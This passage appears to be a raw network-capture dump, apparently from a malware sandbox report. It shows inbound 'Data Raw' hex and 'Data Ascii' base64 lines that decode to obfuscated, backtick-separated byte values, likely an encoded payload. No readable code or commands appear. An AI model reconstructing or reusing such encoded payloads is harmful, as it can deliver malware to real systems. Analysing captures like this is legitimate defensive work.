47 41 7a 4f 53 78 67 4f 44 49 73 59 44 68 43 4c 47 41
                                      Data Ascii: MCxgNUUsYDkzLGA3RCxgQ0EsYDI4LGAwMCxgMDAsYDI4LGAwNSxgRDcsYEJFLGA0RSxgNDksYDU2LGA0RixgMEYsYDgyLGA4NSxgRkIsYEZGLGBGRixgQzEsYDI1LGA3MixgMjMsYDMzLGA2OCxgNzgsYEFDLGAyMyxgMDUsYEJBLGAzRCxgMTMsYEU5LGAyOSxgMkQsYEJDLGAyNixgRjQsYDhGLGAzMyxgMEQsYEJDLGAzOSxgODIsYDhCLGA
                                      2021-12-02 17:36:08 UTC1567INData Raw: 4d 53 78 67 4e 45 49 73 59 44 6c 44 4c 47 42 42 4f 43 78 67 4f 54 41 73 59 44 45 77 4c 47 42 42 4e 53 78 67 4d 55 45 73 59 45 51 35 4c 47 42 45 4d 53 78 67 51 6b 4d 73 59 44 4d 77 4c 47 42 45 4d 69 78 67 51 7a 67 73 59 44 51 34 4c 47 41 35 4d 43 78 67 4d 45 49 73 59 44 45 79 4c 47 42 45 4d 69 78 67 52 44 55 73 59 44 41 78 4c 47 42 46 51 53 78 67 51 54 51 73 59 44 49 78 4c 47 42 44 51 79 78 67 52 44 6b 73 59 44 52 46 4c 47 41 34 4e 69 78 67 4d 6a 67 73 59 44 52 43 4c 47 42 45 51 69 78 67 52 55 45 73 59 44 41 35 4c 47 42 45 52 69 78 67 52 6b 4d 73 59 44 64 45 4c 47 41 7a 51 79 78 67 51 30 55 73 59 45 4d 33 4c 47 41 79 51 79 78 67 4f 54 63 73 59 44 4e 45 4c 47 41 35 51 53 78 67 52 44 67 73 59 45 45 34 4c 47 42 43 4d 69 78 67 52 55 45 73 59 44 4d 31 4c 47 42
                                      Data Ascii: MSxgNEIsYDlDLGBBOCxgOTAsYDEwLGBBNSxgMUEsYEQ5LGBEMSxgQkMsYDMwLGBEMixgQzgsYDQ4LGA5MCxgMEIsYDEyLGBEMixgRDUsYDAxLGBFQSxgQTQsYDIxLGBDQyxgRDksYDRFLGA4NixgMjgsYDRCLGBEQixgRUEsYDA5LGBERixgRkMsYDdELGAzQyxgQ0UsYEM3LGAyQyxgOTcsYDNELGA5QSxgRDgsYEE4LGBCMixgRUEsYDM1LGB
                                      2021-12-02 17:36:08 UTC1583INData Raw: 4e 43 78 67 4d 30 51 73 59 44 59 77 4c 47 41 33 51 53 78 67 51 7a 49 73 59 44 63 35 4c 47 41 7a 51 53 78 67 4e 44 49 73 59 44 6b 78 4c 47 42 42 4e 43 78 67 4e 45 51 73 59 45 4e 44 4c 47 41 32 4f 43 78 67 51 30 4d 73 59 45 5a 42 4c 47 41 79 52 53 78 67 4d 6b 55 73 59 45 4d 34 4c 47 42 43 51 53 78 67 4f 44 6b 73 59 44 67 77 4c 47 42 42 51 69 78 67 4e 55 59 73 59 45 52 43 4c 47 42 44 52 53 78 67 4d 6a 49 73 59 44 4a 43 4c 47 41 34 52 69 78 67 4d 30 49 73 59 44 51 33 4c 47 41 78 4e 43 78 67 4e 30 51 73 59 44 56 43 4c 47 41 35 4f 53 78 67 51 6b 45 73 59 45 4e 45 4c 47 41 7a 4d 53 78 67 4d 44 55 73 59 45 55 34 4c 47 41 7a 51 79 78 67 51 6b 51 73 59 44 6b 35 4c 47 41 33 51 79 78 67 51 55 51 73 59 44 46 44 4c 47 42 42 4f 43 78 67 4d 55 4d 73 59 44 59 7a 4c 47 42
                                      Data Ascii: NCxgM0QsYDYwLGA3QSxgQzIsYDc5LGAzQSxgNDIsYDkxLGBBNCxgNEQsYENDLGA2OCxgQ0MsYEZBLGAyRSxgMkUsYEM4LGBCQSxgODksYDgwLGBBQixgNUYsYERCLGBDRSxgMjIsYDJCLGA4RixgM0IsYDQ3LGAxNCxgN0QsYDVCLGA5OSxgQkEsYENELGAzMSxgMDUsYEU4LGAzQyxgQkQsYDk5LGA3QyxgQUQsYDFDLGBBOCxgMUMsYDYzLGB
                                      2021-12-02 17:36:08 UTC1599INData Raw: 52 53 78 67 4d 54 45 73 59 45 52 46 4c 47 42 47 52 69 78 67 4e 55 45 73 59 44 42 42 4c 47 41 30 51 69 78 67 51 30 59 73 59 45 51 30 4c 47 41 77 52 53 78 67 4d 7a 4d 73 59 45 4d 78 4c 47 41 34 51 69 78 67 4d 6a 67 73 59 44 51 32 4c 47 41 77 4d 53 78 67 4d 55 51 73 59 45 49 77 4c 47 42 47 4f 43 78 67 4e 54 41 73 59 44 51 30 4c 47 42 45 4e 43 78 67 4f 55 59 73 59 44 6c 46 4c 47 41 77 52 69 78 67 51 7a 45 73 59 45 4d 79 4c 47 42 47 4e 69 78 67 51 54 59 73 59 44 51 7a 4c 47 42 46 4f 43 78 67 51 6b 55 73 59 45 4e 42 4c 47 42 45 4d 79 78 67 51 30 51 73 59 45 5a 47 4c 47 42 45 4d 69 78 67 4f 54 49 73 59 45 4d 79 4c 47 41 30 4d 79 78 67 4e 54 49 73 59 45 55 35 4c 47 42 44 52 53 78 67 52 6a 67 73 59 45 59 35 4c 47 41 7a 52 69 78 67 4d 45 49 73 59 45 49 31 4c 47 42
                                      Data Ascii: RSxgMTEsYERFLGBGRixgNUEsYDBBLGA0QixgQ0YsYEQ0LGAwRSxgMzMsYEMxLGA4QixgMjgsYDQ2LGAwMSxgMUQsYEIwLGBGOCxgNTAsYDQ0LGBENCxgOUYsYDlFLGAwRixgQzEsYEMyLGBGNixgQTYsYDQzLGBFOCxgQkUsYENBLGBEMyxgQ0QsYEZGLGBEMixgOTIsYEMyLGA0MyxgNTIsYEU5LGBDRSxgRjgsYEY5LGAzRixgMEIsYEI1LGB
                                      2021-12-02 17:36:08 UTC1615INData Raw: 51 53 78 67 52 54 51 73 59 45 56 42 4c 47 42 47 4e 69 78 67 51 6a 67 73 59 44 68 42 4c 47 42 42 4d 79 78 67 4d 54 41 73 59 44 42 46 4c 47 41 30 4d 69 78 67 52 55 51 73 59 45 52 46 4c 47 42 46 4e 53 78 67 4d 45 51 73 59 45 4a 47 4c 47 41 7a 52 43 78 67 52 44 4d 73 59 45 5a 44 4c 47 42 42 4f 43 78 67 51 6b 51 73 59 44 51 79 4c 47 41 7a 4d 53 78 67 4e 7a 55 73 59 44 52 44 4c 47 41 7a 4d 53 78 67 4e 6a 4d 73 59 44 51 32 4c 47 41 35 51 79 78 67 52 44 45 73 59 44 4d 32 4c 47 41 35 51 79 78 67 52 54 63 73 59 44 49 30 4c 47 41 77 52 43 78 67 4e 44 4d 73 59 45 5a 45 4c 47 41 32 51 69 78 67 4e 30 45 73 59 45 52 47 4c 47 42 43 4e 53 78 67 4e 44 45 73 59 45 52 46 4c 47 42 43 4e 69 78 67 4e 44 6b 73 59 44 56 47 4c 47 42 46 4f 53 78 67 4f 54 45 73 59 44 4a 44 4c 47 41
                                      Data Ascii: QSxgRTQsYEVBLGBGNixgQjgsYDhBLGBBMyxgMTAsYDBFLGA0MixgRUQsYERFLGBFNSxgMEQsYEJGLGAzRCxgRDMsYEZDLGBBOCxgQkQsYDQyLGAzMSxgNzUsYDRDLGAzMSxgNjMsYDQ2LGA5QyxgRDEsYDM2LGA5QyxgRTcsYDI0LGAwRCxgNDMsYEZELGA2QixgN0EsYERGLGBCNSxgNDEsYERFLGBCNixgNDksYDVGLGBFOSxgOTEsYDJDLGA
                                      2021-12-02 17:36:08 UTC1631INData Raw: 4e 43 78 67 4d 54 41 73 59 44 51 77 4c 47 41 7a 4f 43 78 67 4e 45 49 73 59 45 4a 44 4c 47 41 30 4d 79 78 67 51 6a 51 73 59 45 49 34 4c 47 41 31 52 43 78 67 4e 6a 6b 73 59 44 45 31 4c 47 42 45 4e 43 78 67 4e 55 51 73 59 44 56 46 4c 47 42 44 51 53 78 67 51 7a 45 73 59 44 42 46 4c 47 41 35 51 53 78 67 4d 6a 51 73 59 45 46 45 4c 47 42 43 4f 53 78 67 4f 44 41 73 59 45 4d 33 4c 47 41 35 51 69 78 67 4d 54 41 73 59 44 59 7a 4c 47 42 47 52 69 78 67 51 54 59 73 59 45 59 30 4c 47 42 45 51 69 78 67 4d 45 45 73 59 44 63 32 4c 47 41 30 4d 79 78 67 52 55 55 73 59 44 56 42 4c 47 41 35 52 53 78 67 51 55 55 73 59 45 45 32 4c 47 41 34 4f 53 78 67 4e 30 55 73 59 44 5a 42 4c 47 41 30 52 43 78 67 4e 6a 41 73 59 44 42 47 4c 47 41 33 52 53 78 67 52 44 63 73 59 45 49 79 4c 47 42
                                      Data Ascii: NCxgMTAsYDQwLGAzOCxgNEIsYEJDLGA0MyxgQjQsYEI4LGA1RCxgNjksYDE1LGBENCxgNUQsYDVFLGBDQSxgQzEsYDBFLGA5QSxgMjQsYEFELGBCOSxgODAsYEM3LGA5QixgMTAsYDYzLGBGRixgQTYsYEY0LGBEQixgMEEsYDc2LGA0MyxgRUUsYDVBLGA5RSxgQUUsYEE2LGA4OSxgN0UsYDZBLGA0RCxgNjAsYDBGLGA3RSxgRDcsYEIyLGB
                                      2021-12-02 17:36:08 UTC1647INData Raw: 4d 69 78 67 4e 6a 51 73 59 44 59 33 4c 47 41 34 52 43 78 67 4d 45 45 73 59 45 51 79 4c 47 41 34 4d 43 78 67 4f 54 51 73 59 45 59 35 4c 47 41 35 4d 69 78 67 4e 45 51 73 59 45 59 31 4c 47 41 77 4d 53 78 67 4e 44 67 73 59 44 59 35 4c 47 41 78 4d 69 78 67 4f 44 49 73 59 45 55 32 4c 47 41 33 4e 79 78 67 51 6a 51 73 59 45 45 78 4c 47 41 34 51 69 78 67 51 54 4d 73 59 45 46 46 4c 47 42 43 4d 69 78 67 4f 54 51 73 59 44 42 46 4c 47 41 35 51 79 78 67 4d 54 67 73 59 45 59 79 4c 47 42 42 4d 43 78 67 52 44 55 73 59 45 49 79 4c 47 42 45 4d 53 78 67 51 54 49 73 59 44 63 35 4c 47 41 35 4e 69 78 67 52 44 6b 73 59 44 45 33 4c 47 41 78 4e 79 78 67 4e 30 51 73 59 44 67 30 4c 47 42 43 4d 53 78 67 52 54 51 73 59 45 51 34 4c 47 41 31 4f 53 78 67 4d 55 59 73 59 44 4e 44 4c 47 42
                                      Data Ascii: MixgNjQsYDY3LGA4RCxgMEEsYEQyLGA4MCxgOTQsYEY5LGA5MixgNEQsYEY1LGAwMSxgNDgsYDY5LGAxMixgODIsYEU2LGA3NyxgQjQsYEExLGA4QixgQTMsYEFFLGBCMixgOTQsYDBFLGA5QyxgMTgsYEYyLGBBMCxgRDUsYEIyLGBEMSxgQTIsYDc5LGA5NixgRDksYDE3LGAxNyxgN0QsYDg0LGBCMSxgRTQsYEQ4LGA1OSxgMUYsYDNDLGB
                                      2021-12-02 17:36:08 UTC1663INData Raw: 4d 79 78 67 4d 6a 51 73 59 45 4a 47 4c 47 41 79 4d 43 78 67 52 55 4d 73 59 44 68 44 4c 47 41 79 4d 43 78 67 4d 6a 55 73 59 44 64 47 4c 47 41 33 4d 43 78 67 4f 55 59 73 59 44 67 35 4c 47 42 47 4e 69 78 67 4f 54 49 73 59 45 45 31 4c 47 41 79 52 69 78 67 4e 6b 59 73 59 44 4d 33 4c 47 42 45 52 43 78 67 4d 45 59 73 59 44 67 35 4c 47 41 79 4d 53 78 67 4d 54 41 73 59 45 46 43 4c 47 41 31 52 43 78 67 4e 7a 49 73 59 44 41 33 4c 47 42 42 4d 53 78 67 52 44 67 73 59 44 63 35 4c 47 42 43 4d 43 78 67 52 6a 67 73 59 45 59 31 4c 47 41 30 4e 43 78 67 52 6b 59 73 59 45 52 44 4c 47 42 43 4e 43 78 67 4e 6b 49 73 59 44 6b 34 4c 47 41 30 4f 43 78 67 4d 30 55 73 59 45 5a 46 4c 47 41 7a 4d 43 78 67 51 7a 51 73 59 44 52 46 4c 47 41 35 4d 43 78 67 4f 45 51 73 59 44 55 35 4c 47 41
                                      Data Ascii: MyxgMjQsYEJGLGAyMCxgRUMsYDhDLGAyMCxgMjUsYDdGLGA3MCxgOUYsYDg5LGBGNixgOTIsYEE1LGAyRixgNkYsYDM3LGBERCxgMEYsYDg5LGAyMSxgMTAsYEFCLGA1RCxgNzIsYDA3LGBBMSxgRDgsYDc5LGBCMCxgRjgsYEY1LGA0NCxgRkYsYERDLGBCNCxgNkIsYDk4LGA0OCxgM0UsYEZFLGAzMCxgQzQsYDRFLGA5MCxgOEQsYDU5LGA
                                      2021-12-02 17:36:08 UTC1679INData Raw: 52 69 78 67 4e 54 41 73 59 44 6c 42 4c 47 41 33 4e 43 78 67 4e 44 63 73 59 45 4d 33 4c 47 41 32 4f 43 78 67 4f 55 51 73 59 44 68 45 4c 47 42 44 4f 53 78 67 4f 55 59 73 59 44 6c 44 4c 47 41 77 51 53 78 67 4d 54 4d 73 59 44 42 46 4c 47 41 78 4f 43 78 67 52 6b 49 73 59 45 52 46 4c 47 42 45 52 43 78 67 51 6a 4d 73 59 45 51 30 4c 47 41 34 4e 43 78 67 52 44 67 73 59 45 45 32 4c 47 42 43 51 79 78 67 52 55 59 73 59 44 5a 44 4c 47 41 7a 51 53 78 67 4e 7a 4d 73 59 45 52 42 4c 47 42 47 4f 43 78 67 51 7a 49 73 59 45 4d 7a 4c 47 41 35 51 53 78 67 4f 54 4d 73 59 44 4e 45 4c 47 42 46 51 69 78 67 4e 7a 4d 73 59 45 5a 46 4c 47 42 43 4d 69 78 67 4d 54 6b 73 59 44 59 35 4c 47 41 34 51 79 78 67 4d 55 55 73 59 44 52 43 4c 47 42 43 4e 79 78 67 52 44 41 73 59 44 5a 45 4c 47 42
                                      Data Ascii: RixgNTAsYDlBLGA3NCxgNDcsYEM3LGA2OCxgOUQsYDhELGBDOSxgOUYsYDlDLGAwQSxgMTMsYDBFLGAxOCxgRkIsYERFLGBERCxgQjMsYEQ0LGA4NCxgRDgsYEE2LGBCQyxgRUYsYDZDLGAzQSxgNzMsYERBLGBGOCxgQzIsYEMzLGA5QSxgOTMsYDNELGBFQixgNzMsYEZFLGBCMixgMTksYDY5LGA4QyxgMUUsYDRCLGBCNyxgRDAsYDZELGB
                                      2021-12-02 17:36:08 UTC1695INData Raw: 52 69 78 67 52 6a 63 73 59 44 51 79 4c 47 41 79 51 53 78 67 4e 30 55 73 59 44 52 43 4c 47 41 31 4f 53 78 67 52 6a 67 73 59 44 64 44 4c 47 41 79 52 53 78 67 4e 55 55 73 59 44 49 7a 4c 47 41 31 4e 69 78 67 4d 7a 49 73 59 44 55 32 4c 47 41 34 4f 53 78 67 4d 6a 49 73 59 45 45 30 4c 47 41 7a 51 53 78 67 52 44 45 73 59 45 5a 46 4c 47 41 30 4f 43 78 67 4d 45 45 73 59 44 45 79 4c 47 42 46 51 69 78 67 52 45 55 73 59 44 49 34 4c 47 42 45 4d 79 78 67 4e 30 45 73 59 44 63 7a 4c 47 41 31 4f 43 78 67 52 54 59 73 59 45 45 7a 4c 47 41 7a 52 69 78 67 4e 54 49 73 59 45 5a 44 4c 47 41 35 4d 79 78 67 4e 54 63 73 59 44 6c 42 4c 47 42 46 52 53 78 67 51 6a 49 73 59 44 49 35 4c 47 41 33 4e 69 78 67 4e 6b 4d 73 59 44 49 30 4c 47 42 42 4f 53 78 67 51 7a 51 73 59 44 56 44 4c 47 42
                                      Data Ascii: RixgRjcsYDQyLGAyQSxgN0UsYDRCLGA1OSxgRjgsYDdDLGAyRSxgNUUsYDIzLGA1NixgMzIsYDU2LGA4OSxgMjIsYEE0LGAzQSxgRDEsYEZFLGA0OCxgMEEsYDEyLGBFQixgREUsYDI4LGBEMyxgN0EsYDczLGA1OCxgRTYsYEEzLGAzRixgNTIsYEZDLGA5MyxgNTcsYDlBLGBFRSxgQjIsYDI5LGA3NixgNkMsYDI0LGBBOSxgQzQsYDVDLGB
                                      2021-12-02 17:36:08 UTC1711INData Raw: 51 53 78 67 4d 44 41 73 59 45 49 7a 4c 47 41 32 4d 43 78 67 4e 45 4d 73 59 44 45 35 4c 47 41 35 4e 53 78 67 51 55 51 73 59 45 55 78 4c 47 42 47 4e 43 78 67 51 55 45 73 59 45 51 77 4c 47 41 31 4f 53 78 67 4d 7a 67 73 59 45 55 35 4c 47 41 7a 52 53 78 67 4d 6a 59 73 59 45 59 30 4c 47 41 31 4e 69 78 67 4e 44 41 73 59 44 46 44 4c 47 42 46 4d 53 78 67 4d 7a 67 73 59 45 46 46 4c 47 42 46 4f 43 78 67 52 6a 49 73 59 45 5a 46 4c 47 42 45 52 43 78 67 4d 44 67 73 59 45 51 33 4c 47 41 34 4f 43 78 67 52 54 51 73 59 45 45 35 4c 47 42 44 4e 69 78 67 51 7a 63 73 59 44 51 34 4c 47 41 33 51 69 78 67 4e 54 63 73 59 44 4d 77 4c 47 42 44 52 43 78 67 4d 44 55 73 59 45 51 34 4c 47 41 31 4d 43 78 67 51 54 55 73 59 44 63 78 4c 47 42 44 4e 79 78 67 52 6a 55 73 59 44 63 79 4c 47 41
                                      Data Ascii: QSxgMDAsYEIzLGA2MCxgNEMsYDE5LGA5NSxgQUQsYEUxLGBGNCxgQUEsYEQwLGA1OSxgMzgsYEU5LGAzRSxgMjYsYEY0LGA1NixgNDAsYDFDLGBFMSxgMzgsYEFFLGBFOCxgRjIsYEZFLGBERCxgMDgsYEQ3LGA4OCxgRTQsYEE5LGBDNixgQzcsYDQ4LGA3QixgNTcsYDMwLGBDRCxgMDUsYEQ4LGA1MCxgQTUsYDcxLGBDNyxgRjUsYDcyLGA
                                      2021-12-02 17:36:08 UTC1727INData Raw: 4f 43 78 67 4e 6a 51 73 59 45 52 45 4c 47 41 79 4d 43 78 67 51 6a 49 73 59 44 64 43 4c 47 41 7a 51 53 78 67 4e 6b 51 73 59 44 45 35 4c 47 41 79 4f 43 78 67 4d 54 67 73 59 44 52 44 4c 47 42 45 4d 69 78 67 4d 30 4d 73 59 45 5a 47 4c 47 41 31 52 53 78 67 4d 54 45 73 59 45 4e 43 4c 47 41 33 4d 79 78 67 4d 6b 59 73 59 44 6b 35 4c 47 42 42 4d 53 78 67 51 6a 49 73 59 44 45 7a 4c 47 41 79 51 79 78 67 4f 44 45 73 59 45 49 77 4c 47 41 7a 4e 79 78 67 52 6b 55 73 59 44 45 30 4c 47 42 45 4e 43 78 67 4d 6b 45 73 59 44 49 78 4c 47 41 7a 52 43 78 67 4f 54 51 73 59 44 55 78 4c 47 42 42 52 53 78 67 52 6a 63 73 59 44 55 78 4c 47 41 34 51 79 78 67 4e 7a 49 73 59 44 41 7a 4c 47 42 44 4d 53 78 67 4e 6a 67 73 59 45 49 31 4c 47 41 7a 51 69 78 67 4f 54 6b 73 59 45 59 30 4c 47 41
                                      Data Ascii: OCxgNjQsYERELGAyMCxgQjIsYDdCLGAzQSxgNkQsYDE5LGAyOCxgMTgsYDRDLGBEMixgM0MsYEZGLGA1RSxgMTEsYENCLGA3MyxgMkYsYDk5LGBBMSxgQjIsYDEzLGAyQyxgODEsYEIwLGAzNyxgRkUsYDE0LGBENCxgMkEsYDIxLGAzRCxgOTQsYDUxLGBBRSxgRjcsYDUxLGA4QyxgNzIsYDAzLGBDMSxgNjgsYEI1LGAzQixgOTksYEY0LGA
                                      2021-12-02 17:36:08 UTC1743INData Raw: 52 69 78 67 52 44 55 73 59 45 45 30 4c 47 42 44 4d 69 78 67 4e 6b 49 73 59 44 52 43 4c 47 41 7a 4e 43 78 67 4e 6a 55 73 59 44 67 79 4c 47 41 7a 4d 79 78 67 4e 7a 63 73 59 44 67 34 4c 47 42 47 4d 69 78 67 52 54 51 73 59 44 52 47 4c 47 41 7a 4e 53 78 67 4f 54 59 73 59 44 41 30 4c 47 41 34 4e 79 78 67 4f 44 55 73 59 44 6b 35 4c 47 41 79 4e 53 78 67 4d 30 59 73 59 45 4a 47 4c 47 41 34 4d 43 78 67 4d 6b 55 73 59 44 41 79 4c 47 42 47 51 53 78 67 4d 7a 67 73 59 44 51 32 4c 47 42 44 51 79 78 67 4d 44 41 73 59 44 4a 47 4c 47 41 32 52 69 78 67 4d 6a 6b 73 59 45 45 32 4c 47 41 32 4d 53 78 67 4e 6b 4d 73 59 44 42 45 4c 47 41 33 4e 53 78 67 4d 54 55 73 59 45 55 35 4c 47 41 77 51 53 78 67 4f 45 51 73 59 45 4e 45 4c 47 42 45 4d 79 78 67 51 6a 6b 73 59 44 4d 33 4c 47 42
                                      Data Ascii: RixgRDUsYEE0LGBDMixgNkIsYDRCLGAzNCxgNjUsYDgyLGAzMyxgNzcsYDg4LGBGMixgRTQsYDRGLGAzNSxgOTYsYDA0LGA4NyxgODUsYDk5LGAyNSxgM0YsYEJGLGA4MCxgMkUsYDAyLGBGQSxgMzgsYDQ2LGBDQyxgMDAsYDJGLGA2RixgMjksYEE2LGA2MSxgNkMsYDBELGA3NSxgMTUsYEU5LGAwQSxgOEQsYENELGBEMyxgQjksYDM3LGB
                                      2021-12-02 17:36:08 UTC1759INData Raw: 4e 69 78 67 4d 7a 49 73 59 44 4d 79 4c 47 41 33 4d 79 78 67 4e 54 41 73 59 44 45 78 4c 47 41 34 52 53 78 67 52 54 45 73 59 44 6b 31 4c 47 42 43 4d 53 78 67 4e 30 4d 73 59 44 4a 43 4c 47 41 77 4e 53 78 67 4f 54 45 73 59 44 49 7a 4c 47 41 35 4f 43 78 67 4e 7a 63 73 59 44 4d 7a 4c 47 42 47 52 43 78 67 4d 44 41 73 59 44 63 35 4c 47 41 35 4f 53 78 67 4e 7a 49 73 59 44 63 34 4c 47 41 34 51 53 78 67 4e 44 45 73 59 44 4e 44 4c 47 41 7a 4f 43 78 67 4e 44 6b 73 59 45 4e 47 4c 47 42 42 51 69 78 67 4e 30 45 73 59 45 59 77 4c 47 41 78 4e 43 78 67 4d 7a 67 73 59 45 49 33 4c 47 41 35 52 69 78 67 52 54 59 73 59 44 45 33 4c 47 42 46 4e 79 78 67 4e 44 49 73 59 44 68 47 4c 47 42 43 51 79 78 67 4d 55 49 73 59 45 55 32 4c 47 41 31 4d 69 78 67 4f 54 6b 73 59 44 59 34 4c 47 42
                                      Data Ascii: NixgMzIsYDMyLGA3MyxgNTAsYDExLGA4RSxgRTEsYDk1LGBCMSxgN0MsYDJCLGAwNSxgOTEsYDIzLGA5OCxgNzcsYDMzLGBGRCxgMDAsYDc5LGA5OSxgNzIsYDc4LGA4QSxgNDEsYDNDLGAzOCxgNDksYENGLGBBQixgN0EsYEYwLGAxNCxgMzgsYEI3LGA5RixgRTYsYDE3LGBFNyxgNDIsYDhGLGBCQyxgMUIsYEU2LGA1MixgOTksYDY4LGB
                                      2021-12-02 17:36:08 UTC1775INData Raw: 4f 43 78 67 4d 54 51 73 59 45 55 79 4c 47 41 30 52 69 78 67 52 44 63 73 59 45 55 7a 4c 47 41 30 4f 53 78 67 4d 7a 51 73 59 44 6b 33 4c 47 41 30 4e 69 78 67 4e 44 51 73 59 44 59 7a 4c 47 41 79 52 69 78 67 4f 54 4d 73 59 44 4a 43 4c 47 41 7a 4d 53 78 67 4d 44 6b 73 59 45 45 34 4c 47 41 32 51 53 78 67 51 6a 45 73 59 45 4a 43 4c 47 42 42 4f 53 78 67 52 6b 4d 73 59 45 45 77 4c 47 42 44 4d 69 78 67 4d 55 59 73 59 44 63 34 4c 47 41 77 4d 79 78 67 4e 6a 45 73 59 44 64 42 4c 47 41 79 52 53 78 67 4e 6a 55 73 59 45 5a 47 4c 47 41 79 51 69 78 67 51 6a 67 73 59 44 4e 46 4c 47 41 79 4d 43 78 67 4f 44 49 73 59 45 55 77 4c 47 42 47 52 43 78 67 4e 55 55 73 59 44 63 7a 4c 47 41 7a 52 53 78 67 52 6a 41 73 59 44 55 30 4c 47 42 44 4f 53 78 67 52 45 59 73 59 44 6c 44 4c 47 42
                                      Data Ascii: OCxgMTQsYEUyLGA0RixgRDcsYEUzLGA0OSxgMzQsYDk3LGA0NixgNDQsYDYzLGAyRixgOTMsYDJCLGAzMSxgMDksYEE4LGA2QSxgQjEsYEJCLGBBOSxgRkMsYEEwLGBDMixgMUYsYDc4LGAwMyxgNjEsYDdBLGAyRSxgNjUsYEZGLGAyQixgQjgsYDNFLGAyMCxgODIsYEUwLGBGRCxgNUUsYDczLGAzRSxgRjAsYDU0LGBDOSxgREYsYDlDLGB
                                      2021-12-02 17:36:08 UTC1791INData Raw: 4d 69 78 67 4f 54 6b 73 59 44 4d 32 4c 47 41 77 4f 53 78 67 4d 44 4d 73 59 44 56 46 4c 47 41 79 4d 53 78 67 4e 6a 59 73 59 44 45 34 4c 47 42 43 4e 53 78 67 4d 45 51 73 59 45 4a 42 4c 47 41 33 4e 53 78 67 4d 30 49 73 59 45 59 78 4c 47 41 34 51 69 78 67 4f 54 4d 73 59 45 56 42 4c 47 41 79 4d 53 78 67 51 30 4d 73 59 44 41 33 4c 47 42 43 4d 43 78 67 4d 30 45 73 59 44 67 34 4c 47 41 7a 4e 53 78 67 4f 45 51 73 59 44 49 7a 4c 47 41 77 52 69 78 67 52 6b 59 73 59 45 49 31 4c 47 42 46 51 69 78 67 52 6a 6b 73 59 45 49 79 4c 47 41 77 4d 53 78 67 52 44 63 73 59 44 4e 42 4c 47 41 32 51 69 78 67 52 6a 51 73 59 44 6b 78 4c 47 42 47 4d 53 78 67 4d 6a 41 73 59 44 56 42 4c 47 41 30 51 69 78 67 52 6a 6b 73 59 44 6c 47 4c 47 41 30 52 69 78 67 4d 55 55 73 59 45 5a 44 4c 47 41
                                      Data Ascii: MixgOTksYDM2LGAwOSxgMDMsYDVFLGAyMSxgNjYsYDE4LGBCNSxgMEQsYEJBLGA3NSxgM0IsYEYxLGA4QixgOTMsYEVBLGAyMSxgQ0MsYDA3LGBCMCxgM0EsYDg4LGAzNSxgOEQsYDIzLGAwRixgRkYsYEI1LGBFQixgRjksYEIyLGAwMSxgRDcsYDNBLGA2QixgRjQsYDkxLGBGMSxgMjAsYDVBLGA0QixgRjksYDlGLGA0RixgMUUsYEZDLGA
                                      2021-12-02 17:36:08 UTC1807INData Raw: 4f 43 78 67 4d 7a 41 73 59 44 56 43 4c 47 41 35 51 69 78 67 52 44 49 73 59 44 4d 32 4c 47 41 31 4d 53 78 67 4f 45 59 73 59 44 41 77 4c 47 41 78 51 79 78 67 4d 45 49 73 59 44 52 43 4c 47 41 77 4d 69 78 67 51 30 49 73 59 44 4a 42 4c 47 41 79 4e 69 78 67 52 54 67 73 59 44 41 32 4c 47 41 34 4e 53 78 67 4f 55 51 73 59 45 52 43 4c 47 42 45 4e 79 78 67 4e 6a 59 73 59 44 68 42 4c 47 41 7a 52 53 78 67 4f 55 59 73 59 44 63 30 4c 47 41 34 4e 53 78 67 4e 44 67 73 59 44 51 7a 4c 47 41 7a 51 53 78 67 4f 54 6b 73 59 44 59 31 4c 47 41 34 52 53 78 67 4d 7a 55 73 59 44 51 78 4c 47 42 45 4d 79 78 67 4d 44 4d 73 59 44 45 31 4c 47 41 79 4d 43 78 67 4d 6b 49 73 59 44 64 43 4c 47 41 7a 52 53 78 67 4e 55 55 73 59 45 4d 32 4c 47 41 33 51 69 78 67 4d 55 45 73 59 44 51 30 4c 47 42
                                      Data Ascii: OCxgMzAsYDVCLGA5QixgRDIsYDM2LGA1MSxgOEYsYDAwLGAxQyxgMEIsYDRCLGAwMixgQ0IsYDJBLGAyNixgRTgsYDA2LGA4NSxgOUQsYERCLGBENyxgNjYsYDhBLGAzRSxgOUYsYDc0LGA4NSxgNDgsYDQzLGAzQSxgOTksYDY1LGA4RSxgMzUsYDQxLGBEMyxgMDMsYDE1LGAyMCxgMkIsYDdCLGAzRSxgNUUsYEM2LGA3QixgMUEsYDQ0LGB
                                      2021-12-02 17:36:08 UTC1823INData Raw: 4d 79 78 67 52 6b 49 73 59 45 55 32 4c 47 41 34 52 43 78 67 51 54 41 73 59 45 46 44 4c 47 41 79 4e 79 78 67 51 30 45 73 59 45 49 79 4c 47 42 47 51 53 78 67 52 6a 49 73 59 44 45 77 4c 47 41 34 4f 53 78 67 4d 6a 45 73 59 45 4d 33 4c 47 41 31 4f 43 78 67 4e 44 55 73 59 44 46 44 4c 47 41 35 4d 79 78 67 4e 54 4d 73 59 44 41 32 4c 47 41 77 51 79 78 67 52 6a 55 73 59 45 49 35 4c 47 41 32 4e 69 78 67 4f 54 51 73 59 45 4d 31 4c 47 42 46 4d 43 78 67 4d 54 59 73 59 45 49 30 4c 47 41 35 4d 43 78 67 4f 44 51 73 59 44 68 47 4c 47 41 7a 4d 43 78 67 52 55 51 73 59 45 4a 43 4c 47 41 77 52 69 78 67 51 7a 41 73 59 44 64 47 4c 47 42 42 4e 79 78 67 52 54 4d 73 59 44 63 77 4c 47 42 44 52 53 78 67 4e 45 49 73 59 44 46 47 4c 47 41 7a 4d 43 78 67 52 44 41 73 59 44 4e 45 4c 47 42
                                      Data Ascii: MyxgRkIsYEU2LGA4RCxgQTAsYEFDLGAyNyxgQ0EsYEIyLGBGQSxgRjIsYDEwLGA4OSxgMjEsYEM3LGA1OCxgNDUsYDFDLGA5MyxgNTMsYDA2LGAwQyxgRjUsYEI5LGA2NixgOTQsYEM1LGBFMCxgMTYsYEI0LGA5MCxgODQsYDhGLGAzMCxgRUQsYEJCLGAwRixgQzAsYDdGLGBBNyxgRTMsYDcwLGBDRSxgNEIsYDFGLGAzMCxgRDAsYDNELGB
